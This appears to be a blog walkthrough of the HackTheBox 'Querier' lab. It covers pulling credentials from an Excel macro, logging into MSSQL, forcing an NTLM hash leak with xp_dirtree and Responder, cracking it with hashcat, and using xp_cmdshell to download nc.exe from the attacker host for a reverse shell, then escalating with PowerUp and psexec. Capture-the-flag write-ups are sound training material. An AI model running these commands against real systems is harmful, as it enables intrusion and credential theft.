HacktheBox Querier: Walkthrough

HacktheBox Help: Walkthrough
June 8, 2019
VulnHub Zico2: 1 Walkthrough
June 24, 2019
Share This:

HacktheBox Querier: Walkthrough

Nmap

As always we will start with nmap to scan for open ports and services :

Samba Enumeration

the only share I could access anonymously was Reports Shares :

In the share there is one file named “Currency Volume Report.xlsm” . I downloaded the file in my system and trying binwalk on it

Inside “Currency Volume Report.xlsm” there are lots of file hided one of them is “vbaProject.bin”

strings the vbaProject.bin revels the username:”reporting” and the password:”PcwTWTHRwryjc$c6″

Now the main thing is where to use those creds

From the nmap report we also have mssql running on the box

command: mssqlclient.py -windows-auth -p 1433 10.10.10.125/Reporting:PcwTWTHRwryjc\[email protected]

to connect to the mssql, must installed impacket in your system

Gathering hash

i cannot do much from the mssql. i tried xp_cmdshell {cmd} but dont have permission to run that thats why i did hash capturing

First start the responder

Command : responder -I tun0 -v

now in the sql session

Command: ;declare @q varchar(200);set @q=’\10.10.14.170\ANYTHING’+(SELECT SUBSTRING(@@version,1,9))+’.malicious.com/foo’; exec master.dbo.xp_dirtree @q; —

Back to responder

Cracking hash with hashcat

Command : hashcat -m 5600 crackme -o cracked.hash /usr/share/wordlists/rockyou.txt

username:mssql-svc
password:corporate568

again using this credentials on mssql

after connecting i again tried to first enable cmdshell the execute commands from xp_cmdshell

Command:mssqlclient.py -windows-auth -p 1433 10.10.10.125/mssql-svc:[email protected]

Command:enable_xp_cmdshell

Command:xp_cmdshell “net users”

Alright i can now run my commands from here.

Taking shell as (mssql-svc)

First i started my python server on port 80 and then i transfer nc to windows box using powershell

Command : xp_cmdshell “powershell Invoke-WebRequest -Uri 10.10.14.170/nc.exe -OutFile C:\Users\mssql-svc\downloads\nc.exe

The commad hit the server that means file is downloaded now i run nc.exe to take a reverse shell

Reading Flag

Privilege Escalation

After spending some time on the box i run powerup to see if that can give me some juicy information

Powerup Link : https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1

I got the Administrator credentials from the powerup

I used psexec.py from impacket to login as Administrator and obtain the root.txt flag.

Command: psexec.py [email protected]

Reading root Flag

Share This:

Leave a Reply

Your email address will not be published. Required fields are marked *

%d bloggers like this: